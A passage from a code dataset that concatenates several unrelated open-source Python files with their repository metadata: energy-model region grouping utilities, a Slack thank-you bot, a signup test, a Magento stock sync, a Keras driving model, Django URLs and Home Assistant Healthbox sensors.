preprocess_dataset()\n :type processed_ts_dict, processed_1d_dict, processed_2d_dict: Dict\n\n :param n_regions: Total number of regions in the given data\n :type n_regions: int\n\n :param region_index_x, region_index_y: Indicate the two regions between which the custom distance is to be calculated\n range of these indices - [0, n_regions)\n :type region_index_x, region_index_y: int\n\n **Default arguments:**\n\n :param weights: weights for each variable-component pair\n |br| * the default value is None.\n :type weights: Dict\n\n :returns: Custom distance value\n :rtype: float\n \"\"\"\n\n # STEP 1. Check if weights are specified correctly\n if weights != None:\n if \"components\" not in weights.keys():\n raise ValueError(\n \"weights dictionary must contain a 'components' dictionary within it\"\n )\n\n if not set(weights.keys()).issubset({\"components\", \"variables\"}):\n raise ValueError(\n \"Something is wrong with weights dictionary. Please refer to the its template in the doc string\"\n )\n\n if \"variables\" in weights.keys():\n var_weights = weights.get(\"variables\")\n if isinstance(var_weights, str):\n if var_weights != \"all\":\n warnings.warn(\n \"Unrecognised string for variable weights. All variables will be weighted\"\n )\n weights[\"variables\"] = \"all\"\n\n else:\n warnings.warn(\n \"variable list not found in weights dictionary. All variables will be weighted\"\n )\n weights.update({\"variables\": \"all\"})\n\n def _get_var_comp_weight(var_name, comp_name):\n \"\"\"Private function to get weight corresponding to a variable-component pair\"\"\"\n\n wgt = 1\n\n if weights != None:\n [var_category, var] = var_name.split(\n \"_\"\n ) # strip the category and take only var\n\n var_weights = weights.get(\"variables\")\n comp_weights = weights.get(\"components\")\n\n if (var_weights == \"all\") or (var in var_weights):\n if comp_weights.get(\"all\") != None:\n wgt = comp_weights.get(\"all\")\n elif comp_weights.get(comp_name) != None:\n wgt = comp_weights.get(comp_name)\n\n return wgt\n\n # STEP 2. Find distance for each variable category separately\n\n # STEP 3a. Distance of Time Series category\n distance_ts = 0\n for var_name, var_dict in processed_ts_dict.items():\n for comp_name, data_matrix in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract data corresponding to the variable-component pair in both regions\n region_x_data = data_matrix[:, region_index_x]\n region_y_data = data_matrix[:, region_index_y]\n\n # (ii) Calculate distance\n # INFO: ts_region_x and ts_region_y are vectors,\n # subtract the vectors, square each element and add all elements. And multiply with its weight\n distance_ts += (\n sum(np.power((region_x_data - region_y_data), 2)) * var_comp_weight\n )\n\n # STEP 3b. Distance of 1d Variables category\n distance_1d = 0\n for var_name, var_dict in processed_1d_dict.items():\n for comp_name, data_array in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract data corresponding to the variable in both regions\n region_x_data = data_array[region_index_x]\n region_y_data = data_array[region_index_y]\n\n # (iii) Calculate distance\n distance_1d += pow(region_x_data - region_y_data, 2) * var_comp_weight\n\n # STEP 3c. Distance of 2d Variables category\n distance_2d = 0\n\n # STEP 3c (i). Since processed_2d_dict is a condensed matrix, we have to get dist. corresponding to the two given regions\n region_index_x_y = (\n region_index_x * (n_regions - region_index_x)\n + (region_index_y - region_index_x)\n - 1\n )\n\n for var_name, var_dict in processed_2d_dict.items():\n for comp_name, data_array in var_dict.items():\n # (i) Get weight\n var_comp_weight = _get_var_comp_weight(var_name, comp_name)\n\n # (ii) Extract data corresponding to the variable in both regions\n dist = data_array[region_index_x_y]\n\n if not np.isnan(\n dist\n ): # INFO: if the regions are not connected the value will be na\n # Calculate the distance\n distance_2d += pow(dist, 2) * var_comp_weight\n\n # STEP 4. Add all three distances\n return distance_ts + distance_1d + distance_2d\n\n\ndef get_custom_distance_matrix(\n processed_ts_dict, processed_1d_dict, processed_2d_dict, n_regions, weights=None\n):\n \"\"\"\n For every region combination, calculates the custom distance by calling get_custom_distance().\n\n :param processed_ts_dict, processed_1d_dict, processed_2d_dict: Dictionaries obtained as a result of preprocess_dataset()\n :type processed_ts_dict, processed_1d_dict, processed_2d_dict: Dict\n\n :param n_regions: Total number of regions in the given data\n :type n_regions: int\n\n **Default arguments:**\n\n :param weights: weights for each variable-component pair\n |br| * the default value is None.\n :type weights: Dict\n\n :returns: distMatrix - A n_regions by n_regions hollow, symmetric distance matrix\n :rtype: np.ndarray\n \"\"\"\n\n distMatrix = np.zeros((n_regions, n_regions))\n\n # STEP 1. For every region pair, calculate the distance\n for i in range(n_regions):\n for j in range(i + 1, n_regions):\n distMatrix[i, j] = get_custom_distance(\n processed_ts_dict,\n processed_1d_dict,\n processed_2d_dict,\n n_regions,\n i,\n j,\n weights,\n )\n\n # STEP 2. Only upper triangle has values, reflect these values in lower triangle to make it a hollow, symmetric matrix\n distMatrix += distMatrix.T - np.diag(distMatrix.diagonal())\n\n return distMatrix\n\n\ndef get_connectivity_matrix(xarray_datasets):\n \"\"\"\n Generates connectiviy matrix for the given `xarray_datasets`.\n\n :param xarray_datasets: The dictionary of xarray datasets for which connectiviy matrix needs\n to be generated\n :type xarray_datasets: Dict[str, xr.Dataset]\n\n :returns: connectivity_matrix - A n_regions by n_regions symmetric matrix\n :rtype: np.ndarray\n\n .. note::\n The `connectivity_matrix` indicates if two regions are connected or not.\n - In this matrix, if two regions are connected, it is indicated as 1 and 0 otherwise.\n - A given region pair if connected if:\n - Their borders touch at least at one point\n - In case of islands, its nearest mainland region, or\n - If the regions are connected via a transmission line or pipeline\n \"\"\"\n\n geom_xr = xarray_datasets.get(\"Geometry\")\n input_xr = xarray_datasets.get(\"Input\")\n\n n_regions = len(geom_xr[\"space\"].values)\n\n connectivity_matrix = np.zeros((n_regions, n_regions))\n\n # STEP 1: Check for contiguous neighbors\n geometries = gpd.GeoSeries(\n geom_xr[\"geometries\"].values\n ) # NOTE: disjoint seems to work only on geopandas or geoseries object\n for ix, geom in enumerate(geometries):\n neighbors = geometries[~geometries.disjoint(geom)].index.tolist()\n connectivity_matrix[ix, neighbors] = 1\n\n # STEP 2: Find nearest neighbor for island regions\n for row in range(len(connectivity_matrix)):\n if (\n np.count_nonzero(connectivity_matrix[row, :] == 1) == 1\n ): # if a region is connected only to itself\n # get the nearest neighbor based on regions centroids\n centroid_distances = geom_xr[\"centroid_distances\"].values[row, :]\n nearest_neighbor_idx = np.argmin(\n centroid_distances[np.nonzero(centroid_distances)]\n )\n\n # make the connection between the regions (both ways to keep it symmetric)\n (\n connectivity_matrix[row, nearest_neighbor_idx],\n connectivity_matrix[nearest_neighbor_idx, row],\n ) = (1, 1)\n\n # STEP 3: Additionally, check if there are transmission between regions that are not yet connected in the\n # connectivity matrix\n for comp_class, comp_dict in input_xr.items():\n for comp, comp_ds in comp_dict.items():\n for varname, da in comp_ds.data_vars.items():\n if varname[:3] == \"2d_\":\n connectivity_matrix[\n da.values > 0\n ] = 1 # if a pos, non-zero value exits, make a connection!\n\n return connectivity_matrix\n\n\ndef get_region_list(geom_xr, skip_regions, enforced_group):\n \"\"\"\n Generates a modified region list that is to be used during region grouping.\n\n :param geom_xr: The xarray dataset holding the geom info\n :type geom_xr: xr.Dataset\n\n param skip_regions: The region IDs to be skipped while aggregating regions\n |br| * the default value is None\n :type skip_regions: List\n\n * Ex.: ['02_reg']\n ['02_reg', '03_reg]\n\n :param enforced_group: A region group\n |br| * the default value is None\n :type enforced_group: List\n\n * Ex.: ['01_es', '02_es', '03_es']\n\n :returns: connectivity_matrix - A n_regions by n_regions symmetric matrix\n :rtype: np.ndarray\n \"\"\"\n\n if (skip_regions is not None) & (enforced_group is None):\n assert isinstance(\n skip_regions, list\n ), \"A list containing the region ID's to be skipped should be provided.\"\n\n # get all regions\n regions_list = geom_xr[\"space\"].values\n\n # remove regions that should be skipped\n regions_list = np.array(list(set(regions_list) - set(skip_regions)))\n\n # create skipped regions dict\n skipped_dict = {reg: [reg] for reg in skip_regions}\n\n elif (skip_regions is None) & (enforced_group is not None):\n assert isinstance(\n enforced_group, list\n ), \"A dictionary containing the super-regions as keys and sub-regions values should be provided.\"\n\n # get subset of regions\n regions_list = np.array(list(enforced_group))\n\n # create an empty skipped regions dict\n skipped_dict = {}\n\n elif (skip_regions is not None) & (enforced_group is not None):\n assert isinstance(\n skip_regions, list\n ), \"A list containing the region ID's to be skipped should be provided.\"\n assert isinstance(\n enforced_group, list\n ), \"A dictionary containing the super-regions as keys and sub-regions values should be provided.\"\n\n # get region subset based on enfored_group\n skip_regions, enforced_group = list(map(set, [skip_regions, enforced_group]))\n regions_list = enforced_group - skip_regions\n regions_list = np.array(list(regions_list))\n\n # create skipped regions dict\n skipped_dict = {reg: [reg] for reg in skip_regions}\n\n else:\n # get all regions\n regions_list = geom_xr[\"space\"].values\n skipped_dict = {}\n\n return regions_list, skipped_dict\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"FINE/aggregations/spatialAggregation/groupingUtils.py","file_name":"groupingUtils.py","file_ext":"py","file_size_in_byte":19642,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"} +{"seq_id":"73947679146","text":"\"\"\"A encourage bot working on slack, which stores data on google sheets.\"\"\"\n\nimport os\nimport sys\nfrom slack_bolt import App\nfrom slack_bolt.adapter.socket_mode import SocketModeHandler\nfrom slack_sdk.errors import SlackApiError\nfrom utils.logging import logger\nfrom utils import regex\nfrom google_sheet.io import append_to_sheet, get_from_sheet\nfrom utils.compose import compose_onetoall, id_reparthenese, compose_formatted_time\nfrom utils.parse_cfg import parse_cfg\n\napp = App(token=os.environ.get(\"SLACK_BOT_TOKEN\"))\n\n\n@app.event(\"app_mention\")\ndef handle_app_mention_events(body, say):\n \"\"\"Deaful message event handler\"\"\"\n # parse the message\n logger.debug(body)\n if 'edited' in body['event']:\n return\n text = body['event']['text']\n source = body['event']['user']\n target = regex.match_user.findall(text)\n logger.debug(f'Parsed Request: {source} to {target}')\n\n\n # filter out the bot/source and replace the user id with real name in the message\n real_target = []\n real_target_names = []\n for user in target:\n try:\n identity = app.client.users_info(user=user)\n except SlackApiError as e:\n logger.error(f\"Error getting user info: {e}\")\n continue\n\n text = text.replace(id_reparthenese(user), identity['user']['real_name'])\n if identity['user']['is_bot'] or user == source:\n continue\n \n real_target.append(user)\n real_target_names.append(identity['user']['real_name'])\n\n if len(real_target) > 0:\n logger.debug(f'User {source} to {real_target}: {real_target_names}')\n try:\n source_ideneity = app.client.users_info(user=source)\n source_name = source_ideneity['user']['real_name']\n except SlackApiError as e:\n logger.error(f\"Error getting user info: {e}\")\n return\n\n # set the constants\n time = compose_formatted_time(body['event_time'], config['timezone'])\n constants = [time, text]\n values = compose_onetoall(source_name, real_target_names, constants)\n\n # append to the details sheet\n append_to_sheet(config['spreadsheet_id'], config['sheet_name']+'!A1:A1', values)\n\n # check the summary sheet\n summary_names = get_from_sheet(config['spreadsheet_id'], config['summary_name']+'!A2:A')\n summary_names = [name[0] for name in summary_names]\n for name in real_target_names+[source_name,]:\n if name not in summary_names:\n append_to_sheet(config['spreadsheet_id'], config['summary_name']+'!A1:A1', \n [[name, f'=COUNTIF({config[\"sheet_name\"]}!A:A, \"{name}\")', f'=COUNTIF({config[\"sheet_name\"]}!B:B, \"{name}\")']],\n value_input_option='USER_ENTERED')\n \n # send a completion message to the source\n try:\n result = app.client.chat_postMessage(channel=source, text=f\"Your thank-you message to {', '.join(real_target_names)} has been recorded in {config['share_link']}\")\n logger.debug(result)\n for user in real_target:\n result = app.client.chat_postMessage(channel=user, text=f\"You just received a thank-you message from <@{source}>, details in {config['share_link']}\")\n logger.debug(result)\n except SlackApiError as e:\n logger.error(f\"Error posting message: {e}\")\n else:\n try:\n result = app.client.chat_postMessage(channel=source, text=f\"It seems you didn't mention any other user in the thank-you message. If this is a bug, please contact the bot developer.\")\n logger.debug(result)\n except SlackApiError as e:\n logger.error(f\"Error posting message: {e}\")\n\nif __name__ == \"__main__\":\n # parse config path\n if len(sys.argv) > 1:\n config_path = sys.argv[1]\n config = parse_cfg(config_path)\n else:\n config = parse_cfg()\n\n SocketModeHandler(app, os.environ[\"SLACK_APP_TOKEN\"]).start()\n","repo_name":"LemonAndRabbit/ES2-Bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1234084116","text":"import unittest\nimport uuid\nfrom .MockContext import MockContext\nimport src.signup.index\nimport src.signin.index\n\nclass SignupTest(unittest.TestCase):\n def test_signup(self):\n identity = str(uuid.uuid4())\n\n res = src.signup.index.handler(\n {\n 'IdentityId': identity,\n 'id': identity,\n 'identifier': '',\n 'provider': 'test',\n 'firstname': 'First',\n 'lastname': 'Last',\n 'displayName': 'First Last',\n 'email_address': 'test@domain.invalid'\n },\n MockContext('signup', '$LATEST')\n )\n\n res2 = src.signin.index.handler(\n {\n 'IdentityId': identity\n },\n MockContext('signin', '$LATEST')\n )\n\n self.assertEquals('success', res2['status'])\n self.assertEquals('login successful', res2['msg'])\n self.assertEquals(identity, res2['data']['IdentityId'])\n","repo_name":"mediix/SQRL_Web","sub_path":"Lambda/sqrlBackend/tests/testSignup.py","file_name":"testSignup.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11583907631","text":"from YBLEGACY import qsatype\nimport json\nfrom datetime import datetime\n\nfrom controllers.base.magento2.inventory.controllers.inventory_upload import InventoryUpload\nfrom controllers.api.magento2.inventory_canal.serializers.inventorycanal_serializer import InventorySerializer\n\nclass Mg2InventoryCanalUpload(InventoryUpload):\n\n _ssw = \"\"\n\n def __init__(self, params=None):\n super().__init__(\"mg2inventorycanal\", params)\n\n inventory_params = self.get_param_sincro('mg2InventoryCanalUpload')\n self.inventory_url = inventory_params['url']\n self.inventory_test_url = inventory_params['test_url']\n\n self.set_sync_params(self.get_param_sincro('mg2'))\n\n self.small_sleep = 1\n self.large_sleep = 30\n self.no_sync_sleep = 60\n\n def get_data(self):\n data = self.get_db_data()\n\n if data == []:\n return data\n\n new_inventory = []\n\n oCanales = json.loads(qsatype.FLUtil.sqlSelect(\"param_parametros\", \"valor\", \"nombre = 'CANALES_WEB'\"))\n datos = {}\n datos[\"ocanales\"] = oCanales\n for idx in range(len(data)):\n datos[\"linea\"] = data[idx]\n inventory = self.get_inventorycanal_serializer().serialize(datos)\n new_inventory.append(inventory)\n \n '''inventory_default = inventory.copy()\n cantidad = 0\n if float(inventory_default['quantity']) > 0:\n cantidad = 1\n \n inventory_default.update({\n \"source_code\": \"default\",\n \"stock_id\": \"1\",\n \"quantity\": 1,\n \"status\": 1\n })\n \n new_inventory.append(inventory_default)'''\n\n if not new_inventory:\n return new_inventory\n\n return {\n \"sourceItems\": new_inventory\n }\n\n def get_inventorycanal_serializer(self):\n return InventorySerializer()\n\n def send_data(self, data):\n inventory_url = self.inventory_url if self.driver.in_production else self.inventory_test_url\n\n for idx in range(len(data[\"sourceItems\"])):\n del data[\"sourceItems\"][idx][\"children\"]\n if data:\n print(str(inventory_url))\n print(str(json.dumps(data)))\n result = self.send_request(\"post\", url=inventory_url, data=json.dumps(data))\n print(str(result))\n\n return data\n\n def get_db_data(self):\n body = []\n\n q = qsatype.FLSqlQuery()\n q.setSelect(\"ssw.idss, ssw.barcode, ssw.codcanalweb, aa.referencia, aa.talla, st.idstockmagento\")\n q.setFrom(\"eg_sincrostockwebcanalweb ssw INNER JOIN atributosarticulos aa ON ssw.barcode = aa.barcode INNER JOIN mg_storeviews st ON ssw.codcanalweb = st.codcanalweb\")\n q.setWhere(\"(NOT ssw.sincronizado OR ssw.sincronizado = false) AND st.activo GROUP BY ssw.idss, ssw.barcode, ssw.codcanalweb, aa.referencia, aa.talla, st.idstockmagento ORDER BY ssw.fecha desc, ssw.hora desc, ssw.idss LIMIT 50\")\n\n q.exec_()\n\n body = []\n if not q.size():\n return body\n\n body = self.fetch_query(q)\n for row in body:\n if self._ssw == \"\":\n self._ssw = str(row['ssw.idss'])\n else:\n self._ssw += \",\"\n self._ssw += str(row['ssw.idss'])\n\n return body\n\n def after_sync(self, response_data=None):\n qsatype.FLSqlQuery().execSql(\"UPDATE eg_sincrostockwebcanalweb SET sincronizado = true WHERE idss IN ({})\".format(self._ssw))\n\n self.log(\"Exito\", \"Stock sincronizado correctamente\")\n\n return self.small_sleep\n","repo_name":"yeboyebo/elganso_sync","sub_path":"ctrl_api_magento2_inventory_canal__mg2_inventorycanal_upload.py","file_name":"ctrl_api_magento2_inventory_canal__mg2_inventorycanal_upload.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7067790206","text":"import os\nimport csv\nimport numpy as np\n\n# import basic scikit learn method for processing data\nfrom sklearn.model_selection import train_test_split\nfrom random import shuffle\nimport sklearn\nimport math\n\n# import all necessary keras modules necessary\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Flatten, Dropout\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers import Lambda, Cropping2D\nfrom math import ceil\nfrom keras.optimizers import Adam\n\n\n\n\nsamples = []\nwith open('./data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n next(reader) #skips the first line\n\n for line in reader:\n samples.append(line)\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\nimport cv2\nimport numpy as np\nimport sklearn\n\ndef generator(samples, batch_size=256):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n for batch_sample in batch_samples:\n name = './data/IMG/'+batch_sample[0].split('/')[-1]\n center_image = cv2.imread(name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# Set our batch size\nbatch_size = 256\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n\nch, row, col = 3, 80, 320 # Trimmed image format\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \n\n#model.add(... finish defining the rest of your model architecture here ...)\nmodel.add(Cropping2D(cropping=((65, 20), (0, 0)), input_shape=(160,320,3)))\nmodel.add(Lambda(lambda x: x / 255.0 - 0.5, input_shape=(160, 320, 3)))\n\n#model.add(Lambda(lambda x: (x / 255.0) - 0.5))\nmodel.add(Conv2D(24, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(36, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(48, (5, 5), strides=(2, 2), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(50))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_squared_error', optimizer=Adam(lr=0.0001))\nmodel.fit_generator (train_generator , \n steps_per_epoch = ceil(len(train_samples)/batch_size) ,\n validation_data = validation_generator ,\n validation_steps = ceil(len(validation_samples)/batch_size) ,\n epochs=6, verbose=1)\nmodel.save('model202.h5')\n\n","repo_name":"a7medhish/bahavirol-cloning","sub_path":"home/CarND-Behavioral-Cloning-P3/model2.py","file_name":"model2.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24020423133","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.views.generic import DetailView, ListView\nfrom blog.models import Post\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'djblog.views.home', name='home'),\n # url(r'^djblog/', include('djblog.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n (r'^', include('blog.urls')), \n url(r'^admin/', include(admin.site.urls)),\n url(r'(?P[a-zA-Z0-9_.-]+)/$',\n DetailView.as_view(\n model=Post,\n template_name='blog/post_detail.html'),\n name='single_post'),\n)\n","repo_name":"djchung/djblog","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70199117547","text":"\"\"\"Sensor platform for healthbox.\"\"\"\nfrom __future__ import annotations\n\nfrom decimal import Decimal\nfrom collections.abc import Callable\nfrom dataclasses import dataclass\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity\nfrom homeassistant.const import (\n UnitOfTemperature,\n PERCENTAGE,\n CONCENTRATION_PARTS_PER_MILLION,\n CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,\n)\n\n\nfrom homeassistant.components.sensor import (\n SensorEntity,\n SensorEntityDescription,\n SensorDeviceClass,\n SensorStateClass,\n)\n\n\nfrom .const import DOMAIN, MANUFACTURER, HealthboxRoom, LOGGER\nfrom .coordinator import HealthboxDataUpdateCoordinator\n\n\n@dataclass\nclass HealthboxGlobalEntityDescriptionMixin:\n \"\"\"Mixin values for Healthbox Global entities.\"\"\"\n\n value_fn: Callable[[], float | int | str | Decimal | None]\n\n\n@dataclass\nclass HealthboxGlobalSensorEntityDescription(\n SensorEntityDescription, HealthboxGlobalEntityDescriptionMixin\n):\n \"\"\"Class describing Healthbox Global sensor entities.\"\"\"\n\n\n@dataclass\nclass HealthboxRoomEntityDescriptionMixin:\n \"\"\"Mixin values for Healthbox Room entities.\"\"\"\n\n room: HealthboxRoom\n value_fn: Callable[[], float | int | str | Decimal | None]\n\n\n@dataclass\nclass HealthboxRoomSensorEntityDescription(\n SensorEntityDescription, HealthboxRoomEntityDescriptionMixin\n):\n \"\"\"Class describing Healthbox Room sensor entities.\"\"\"\n\n\ndef generate_room_sensors_for_healthbox(\n coordinator: HealthboxDataUpdateCoordinator,\n) -> list[HealthboxRoomSensorEntityDescription]:\n \"\"\"Generate sensors for each room.\"\"\"\n room_sensors: list[HealthboxRoomSensorEntityDescription] = []\n if coordinator.api.advanced_api_enabled:\n for room in coordinator.api.rooms:\n if \"indoor temperature\" in room.enabled_sensors:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_temperature\",\n name=f\"{room.name} Temperature\",\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n icon=\"mdi:thermometer\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_temperature,\n suggested_display_precision=2,\n ),\n )\n if \"indoor relative humidity\" in room.enabled_sensors:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_humidity\",\n name=f\"{room.name} Humidity\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:water-percent\",\n device_class=SensorDeviceClass.HUMIDITY,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_humidity,\n suggested_display_precision=2,\n ),\n )\n if \"indoor CO2\" in room.enabled_sensors:\n if room.indoor_co2_concentration is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_co2_concentration\",\n name=f\"{room.name} CO2 Concentration\",\n native_unit_of_measurement=CONCENTRATION_PARTS_PER_MILLION,\n icon=\"mdi:molecule-co2\",\n device_class=SensorDeviceClass.CO2,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_co2_concentration,\n suggested_display_precision=2,\n ),\n )\n if \"indoor air quality index\" in room.enabled_sensors:\n if room.indoor_aqi is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_aqi\",\n name=f\"{room.name} Air Quality Index\",\n native_unit_of_measurement=None,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.AQI,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_aqi,\n suggested_display_precision=2,\n ),\n )\n if \"indoor volatile organic compounds\" in room.enabled_sensors:\n if room.indoor_voc_microg_per_cubic is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_voc\",\n name=f\"{room.name} Volatile Organic Compounds\",\n native_unit_of_measurement=CONCENTRATION_MICROGRAMS_PER_CUBIC_METER,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.VOLATILE_ORGANIC_COMPOUNDS,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.indoor_voc_microg_per_cubic,\n suggested_display_precision=2,\n ),\n )\n\n for room in coordinator.api.rooms:\n if room.boost is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_boost_level\",\n name=f\"{room.name} Boost Level\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:fan\",\n # device_class=SensorDeviceClass.,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.boost.level,\n suggested_display_precision=2,\n ),\n )\n if room.airflow_ventilation_rate is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_airflow_ventilation_rate\",\n name=f\"{room.name} Airflow Ventilation Rate\",\n native_unit_of_measurement=PERCENTAGE,\n icon=\"mdi:fan\",\n # device_class=SensorDeviceClass.,\n state_class=SensorStateClass.MEASUREMENT,\n room=room,\n value_fn=lambda x: x.airflow_ventilation_rate * 100,\n suggested_display_precision=2,\n ),\n )\n if room.profile_name is not None:\n room_sensors.append(\n HealthboxRoomSensorEntityDescription(\n key=f\"{room.room_id}_profile\",\n name=f\"{room.name} Profile\",\n icon=\"mdi:account-box\",\n room=room,\n value_fn=lambda x: x.profile_name,\n ),\n )\n return room_sensors\n\n\ndef generate_global_sensors_for_healthbox(\n coordinator: HealthboxDataUpdateCoordinator,\n) -> list[HealthboxGlobalSensorEntityDescription]:\n \"\"\"Generate global sensors.\"\"\"\n global_sensors: list[HealthboxGlobalSensorEntityDescription] = []\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"global_aqi\",\n name=\"Global Air Quality Index\",\n native_unit_of_measurement=None,\n icon=\"mdi:leaf\",\n device_class=SensorDeviceClass.AQI,\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.global_aqi,\n suggested_display_precision=2,\n )\n )\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"error_count\",\n name=\"Error Count\",\n native_unit_of_measurement=None,\n icon=\"mdi:alert-outline\",\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.error_count,\n suggested_display_precision=0,\n )\n )\n if coordinator.api.wifi.status:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_status\",\n name=\"WiFi Status\",\n icon=\"mdi:wifi\",\n value_fn=lambda x: x.wifi.status,\n )\n )\n if coordinator.api.wifi.internet_connection is not None:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_internet_connection\",\n name=\"WiFi Internet Connection\",\n native_unit_of_measurement=None,\n icon=\"mdi:web\",\n state_class=SensorStateClass.MEASUREMENT,\n value_fn=lambda x: x.wifi.internet_connection,\n )\n )\n if coordinator.api.wifi.ssid:\n global_sensors.append(\n HealthboxGlobalSensorEntityDescription(\n key=\"wifi_ssid\",\n name=\"WiFi SSID\",\n icon=\"mdi:wifi-settings\",\n value_fn=lambda x: x.wifi.ssid,\n )\n )\n return global_sensors\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the sensor platform.\"\"\"\n coordinator: HealthboxDataUpdateCoordinator = hass.data[DOMAIN][\n config_entry.entry_id\n ]\n\n global_sensors = generate_global_sensors_for_healthbox(coordinator=coordinator)\n room_sensors = generate_room_sensors_for_healthbox(coordinator=coordinator)\n entities = []\n\n for description in global_sensors:\n entities.append(HealthboxGlobalSensor(coordinator, description))\n for description in room_sensors:\n entities.append(HealthboxRoomSensor(coordinator, description))\n\n async_add_entities(entities)\n\n\nclass HealthboxGlobalSensor(\n CoordinatorEntity[HealthboxDataUpdateCoordinator], SensorEntity\n):\n \"\"\"Representation of a Healthbox Room Sensor.\"\"\"\n\n entity_description: HealthboxGlobalSensorEntityDescription\n\n def __init__(\n self,\n coordinator: HealthboxDataUpdateCoordinator,\n description: HealthboxGlobalSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize Sensor Domain.\"\"\"\n super().__init__(coordinator)\n\n self.entity_description = description\n self._attr_unique_id = f\"{coordinator.config_entry.entry_id}-{description.key}\"\n self._attr_name = f\"Healthbox {description.name}\"\n self._attr_device_info = DeviceInfo(\n name=f\"{coordinator.api.serial}\",\n identifiers={(DOMAIN, coordinator.config_entry.entry_id)},\n manufacturer=MANUFACTURER,\n model=coordinator.api.description,\n hw_version=coordinator.api.warranty_number,\n sw_version=coordinator.api.firmware_version,\n )\n\n @property\n def native_value(self) -> float | int | str | Decimal:\n \"\"\"Sensor native value.\"\"\"\n return self.entity_description.value_fn(self.coordinator.api)\n\n\nclass HealthboxRoomSensor(\n CoordinatorEntity[HealthboxDataUpdateCoordinator], SensorEntity\n):\n \"\"\"Representation of a Healthbox Room 